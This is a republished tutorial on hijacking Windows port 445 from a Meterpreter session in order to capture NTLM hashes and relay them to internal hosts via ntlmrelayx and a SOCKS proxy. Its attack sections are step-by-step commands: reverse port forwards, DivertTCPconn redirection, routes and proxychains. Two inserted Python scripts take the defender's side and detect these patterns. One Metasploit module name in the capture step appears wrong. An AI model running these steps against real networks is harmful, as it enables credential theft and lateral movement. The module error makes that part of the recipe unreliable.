How to understand Meterpreter implementing remote NTLM Relay attack Test on Windows Port 445

2025-01-18 Update. From: SLTechnology News&Howtos, Development section

Shulou (Shulou.com) 06/02 Report

Today I will talk about how Meterpreter can be used to test a remote NTLM relay attack through Windows port 445. Many people are not familiar with this, so to make it easier to follow, the editor has summarized the technique below. I hope you get something out of this article.

Hijacking port 445 to perform relay attacks or hash-capturing attacks is by now a common technique. But how do you listen on port 445 when you have infected the target device with meterpreter? The question came up again just a few weeks ago. In fact, existing tools already solve this problem; few people simply know about them.

We will show how to use these tools to perform relay attacks through the target device. The advantage of this technique is that we do not need py2exe or the whole Python stack on the infected host; a small driver plus meterpreter is enough to achieve the goal.

Please note that, for the convenience of the demonstration, we put all the files on the disk of the target host. If you do not want to do that in practice, you can use a RAM disk or extend meterpreter's current in-memory execution capability to achieve the same result. You can also use static compilation and similar methods to bundle the additional DLL files.

Who is the "owner" of port 445?

First, we need to know which service or process on the host is responsible for listening on port 445. In general, when solving this kind of problem, I like to search the Internet first: if someone has already answered the question, we can verify the answer manually on the system and reuse it directly. So I searched Google for the following:

msdn process listening port 445

I then ran a series of tests, enabling and disabling candidate services to determine which one was responsible for listening on port 445, and found the Server service. But stopping this service does not have an immediate effect for us, because the device must be restarted before the port is released, and that is obviously not a feasible solution: ideally we do not want to reboot the infected device.

After digging into the properties of the service, we can find the command that starts it:

C:\WINDOWS\system32\svchost.exe -k netsvcs -p

If you want to learn more about svchost.exe 's command line arguments, I suggest you visit Geoff Chappell's website: [portal]

If we navigate to the registry key described in that article:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost

We will see a lot of bundled services, but this does not completely solve our problem, so we need to find another way. Here I found an article on EternalBlue exploitation that contains a vulnerability analysis on Windows 10: the SMB protocol is implemented in the srv.sys driver and a few drivers that work with it. Finally, to get a definitive confirmation, we also found this article: [portal]

Now we know that the code handling communication on port 445 lives in the kernel. This is definitely bad news for us, because hijacking a kernel-owned socket is very difficult. Next, we will show how to hijack and redirect port 445 anyway.
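The "who owns port 445" question has a defender's counterpart: on a Windows host the SMB listener belongs to the kernel (srv.sys), so `netstat -ano` reports it under PID 4, the System process. The following script is an added illustration, not code from the original article or from any tool it mentions. It parses `netstat -ano` style output (a constructed sample is embedded) and flags two things a host audit would want to see: a 445 listener not owned by PID 4, and loopback listeners on the diversion ports used in this article's walkthrough (8445 and 4445; treating those as an assumed watch list).

```python
"""Audit the owner of TCP port 445 from `netstat -ano` output (added example)."""
import re
from dataclasses import dataclass

SYSTEM_PID = 4                      # kernel-owned sockets (srv.sys) are reported under PID 4 on Windows
DIVERSION_PORTS = {8445, 4445}      # assumption: watch list of local ports used for 445 diversion

# Constructed sample in the shape of `netstat -ano` output; not captured from a real host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8445         0.0.0.0:0              LISTENING       5120
  TCP    192.168.222.5:49700    192.168.222.10:445     ESTABLISHED     4
  UDP    0.0.0.0:137            *:*                                    4
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    pid: int


def parse_netstat(text: str) -> list[Listener]:
    """Return the listening sockets found in netstat output.

    TCP rows carry a State column; UDP rows do not, so the PID is taken
    from the last field and only TCP rows are filtered on LISTENING.
    """
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        addr, _, port = local.rpartition(":")       # rpartition keeps IPv6 literals like [::] intact
        pid = int(parts[-1])
        if proto == "TCP" and parts[3] != "LISTENING":
            continue
        listeners.append(Listener(proto, addr, int(port), pid))
    return listeners


def audit_port_445(listeners: list[Listener]) -> list[str]:
    """Flag unexpected 445 owners and loopback listeners on the diversion ports."""
    findings = []
    for lst in listeners:
        if lst.proto != "TCP":
            continue
        if lst.port == 445 and lst.pid != SYSTEM_PID:
            findings.append(
                f"port 445 listener owned by PID {lst.pid}, expected System (PID {SYSTEM_PID})"
            )
        if lst.port in DIVERSION_PORTS and lst.addr in ("127.0.0.1", "[::1]"):
            findings.append(
                f"loopback listener on {lst.addr}:{lst.port} (PID {lst.pid}) matches the 445 -> {lst.port} diversion pattern"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_port_445(parse_netstat(SAMPLE_NETSTAT)):
        print(finding)
```

On the constructed sample the 445 listener is correctly owned by PID 4 and the only finding is the loopback listener on 8445. A WFP-based redirect does not change who owns the 445 socket, which is exactly why the second check (the local forwarding port) is the more useful one; in practice feed the script real `netstat -ano` output and tune DIVERSION_PORTS to your environment.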

Hijacking and redirection of Port 445

Now that we know the "owner" of port 445 lives in the kernel, we can start designing our strategy. My first thought was Linux's iptables, which can hijack incoming or outgoing connections because it works at a low layer of the network stack. To find out whether this approach can be applied to Windows, we need to look at the inner workings of the Windows firewall:

1. Windows firewall architecture: [portal]

2. Overview of Windows filter platform: [portal]

Here we need to create a special driver. You might think netsh port redirection would be useful, but it is not. Although writing a driver may not sound like the ideal solution, if you search for terms like "wfp port connections" you will find that @agsolino has already provided the answer. Let's look at how to use meterpreter together with the technique above to redirect connections to port 445 on the target system. The following figure shows how the whole technique works:

We have a host infected with meterpreter. Through meterpreter we set up a reverse port forward and receive meterpreter connections on our host through port 4444. A remote listener on port 8445 (the meterpreter forward) receives the connection data originally destined for port 445, so connections to port 445 are hijacked and forwarded to metasploit. Now let's look at how to hijack Windows port 445 to capture some credentials:

1. Set up a working meterpreter session with administrator privileges.

2. Set up an SMB capture server:

a) use auxiliary/scanner/smb/smb_login

b) set SRVPORT 9445

c) run -j

3. Set up a meterpreter reverse port forward:

portfwd add -R -L 127.0.0.1 -l 9445 -p 8445

4. Set up the port 445 hijack:

DivertTCPconn.exe 445 8445

Now, when a host on the target network connects to port 445 of the infected host, you receive a hash in your metasploit console:

Next, let's take a look at the complete implementation mechanism of a remote NTLM relay attack.

How to implement SMB Relay attack through meterpreter

Now we will run ntlmrelayx on an Ubuntu system, and the relay target is a system inside the target network. This involves forwarding traffic in both directions through meterpreter: the reverse connection ensures that hosts in the target network can reach ntlmrelayx through the infected host, and the connection back into the target network goes through a SOCKS proxy. The following figure shows the entire attack flow:

The first step is similar to the previous image, where we will set up our reverse channel:

1. Set up a working meterpreter session with administrator privileges.

2. Set up a meterpreter reverse port forward:

portfwd add -R -p 4445 -l 445 -L 127.0.0.1

3. Hijack port 445 via meterpreter:

execute -f divertTCPconn.exe -a '445 4445'

To set up the forward channel, we add a route through the meterpreter session to redirect the traffic and set up a SOCKS proxy:

1. Add a route through meterpreter, specifying the target IP address and the session ID:

route add 192.168.222.103/32 3

2. Set up the SOCKS proxy:

a) use auxiliary/server/socks4a

b) run

c) make sure the SOCKS port is specified in /etc/proxychains.conf (default 1080)

3. Run ntlmrelayx through the SOCKS proxy:

sudo proxychains ntlmrelayx.py -t smb://192.168.222.103 -smb2support

The following figure shows the running result:
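From the defender's side, a relayed authentication like the one above leaves a characteristic trace on the relay target: the TCP connection arrives from the relay host, but the NTLM AUTHENTICATE message still carries the workstation name of the original client, so the target's Security log shows a 4624 network logon (type 3, NTLM) whose workstation name and source IP do not belong together. The following script is an added example, not code from the article or from impacket/metasploit. It applies that heuristic to constructed 4624 records against a constructed asset inventory (assumed to come from DHCP or a CMDB in practice).

```python
"""Flag NTLM network logons whose claimed workstation does not match the source IP (added example)."""
from dataclasses import dataclass

# Constructed asset inventory: workstation name -> expected IP address.
INVENTORY = {
    "WS-FINANCE01": "192.168.222.50",
    "WS-HR02": "192.168.222.51",
    "SRV-FILE01": "192.168.222.103",
}


@dataclass(frozen=True)
class LogonEvent:
    """The 4624 fields the check needs, named as in the Windows Security log."""
    event_id: int
    logon_type: int
    auth_package: str      # AuthenticationPackageName: "NTLM" or "Kerberos"
    target_user: str       # TargetUserName
    workstation: str       # WorkstationName (comes from the client's NTLM message)
    ip_address: str        # IpAddress (where the TCP connection actually came from)


# Constructed sample events; not taken from a real log.
SAMPLE_EVENTS = [
    LogonEvent(4624, 3, "NTLM", "jdoe", "WS-FINANCE01", "192.168.222.50"),   # consistent
    LogonEvent(4624, 3, "Kerberos", "asmith", "WS-HR02", "192.168.222.51"),  # not NTLM, out of scope
    LogonEvent(4624, 3, "NTLM", "jdoe", "WS-FINANCE01", "192.168.222.77"),   # claims WS-FINANCE01, arrived from elsewhere
    LogonEvent(4624, 2, "NTLM", "admin", "SRV-FILE01", "127.0.0.1"),         # interactive logon, out of scope
    LogonEvent(4624, 3, "NTLM", "svc", "UNKNOWN-HOST", "192.168.222.90"),     # not in inventory, cannot judge
]


def relay_suspects(events, inventory):
    """Return (user, claimed workstation, expected IP, actual IP) for mismatching NTLM network logons.

    Only type 3 NTLM logons are considered; hosts missing from the inventory are
    skipped rather than flagged, since the mismatch cannot be established for them.
    """
    suspects = []
    for ev in events:
        if ev.event_id != 4624 or ev.logon_type != 3 or ev.auth_package.upper() != "NTLM":
            continue
        expected_ip = inventory.get(ev.workstation.upper())
        if expected_ip is None:
            continue
        if expected_ip != ev.ip_address:
            suspects.append((ev.target_user, ev.workstation, expected_ip, ev.ip_address))
    return suspects


if __name__ == "__main__":
    for user, ws, expected, actual in relay_suspects(SAMPLE_EVENTS, INVENTORY):
        print(f"{user}: claimed {ws} ({expected}) but authenticated from {actual}")
```

On the constructed sample only the third record is reported. Two caveats for real use: the workstation name is attacker-controlled, so an absence of mismatches proves nothing, and the check is a detection aid rather than a fix; requiring SMB signing on the relay targets is what stops the relayed SMB session from being accepted in the first place.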

After reading the above, do you have a better understanding of how Meterpreter can be used to test remote NTLM relay attacks through Windows port 445? If you want to learn more, please follow the industry information channel. Thank you for your support.
